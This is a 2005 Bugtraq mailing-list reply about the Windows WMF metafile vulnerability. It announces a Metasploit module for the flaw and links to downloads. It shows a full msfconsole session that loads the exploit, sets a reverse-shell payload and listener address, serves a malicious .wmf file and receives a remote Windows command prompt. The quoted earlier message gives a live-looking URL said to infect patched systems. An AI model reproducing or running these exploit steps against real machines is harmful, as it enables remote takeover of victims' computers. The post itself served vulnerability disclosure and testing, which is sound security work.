[41846] in bugtraq


Re: Is this a new exploit?

daemon@ATHENA.MIT.EDU (H D Moore)
Wed Dec 28 14:02:19 2005

From: H D Moore <sflist@digitaloffense.net>
To: bugtraq@securityfocus.com
Date: Tue, 27 Dec 2005 21:34:51 -0600
In-Reply-To: <20051227202014.7446.qmail@securityfocus.com>
MIME-Version: 1.0
Content-Type: text/plain;
  charset="iso-8859-6"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Message-Id: <200512272134.51620.sflist@digitaloffense.net>

I ported the exploit to the Metasploit Framework in case anyone wants to 
test it without installing a thousand spyware apps...

Available from 'msfupdate' for MSF users, or in the 2.5 snapshot:

--http://metasploit.com/projects/Framework/exploits.html#ie_xp_pfv_metafile
--http://metasploit.com/tools/framework-2.5-snapshot.tar.gz

Tested on Win XP SP1 and SP2.

-HD

+ -- --=[ msfconsole v2.5 [147 exploits - 77 payloads]

msf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 192.168.0.2
LHOST -> 192.168.0.2
msf ie_xp_pfv_metafile(win32_reverse) > exploit

[*] Starting Reverse Handler.
[*] Waiting for connections to http://0.0.0.0:8080/anything.wmf
[*] HTTP Client connected from 192.168.0.219:1060 using Windows XP
[*] Got connection from 192.168.0.2:4321 <-> 192.168.0.219:1061

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\XXXX\Desktop>  


On Tuesday 27 December 2005 14:20, noemailpls@noemail.ziper wrote:
> Warning: the following URL successfully exploited a fully patched
> Windows XP system with a freshly updated Norton Anti-Virus.
>
> unionseek.com/d/t1/wmf_exp.htm
>
> The URL runs a .wmf and executes the virus; F-Secure will pick up the
> virus, Norton will not.
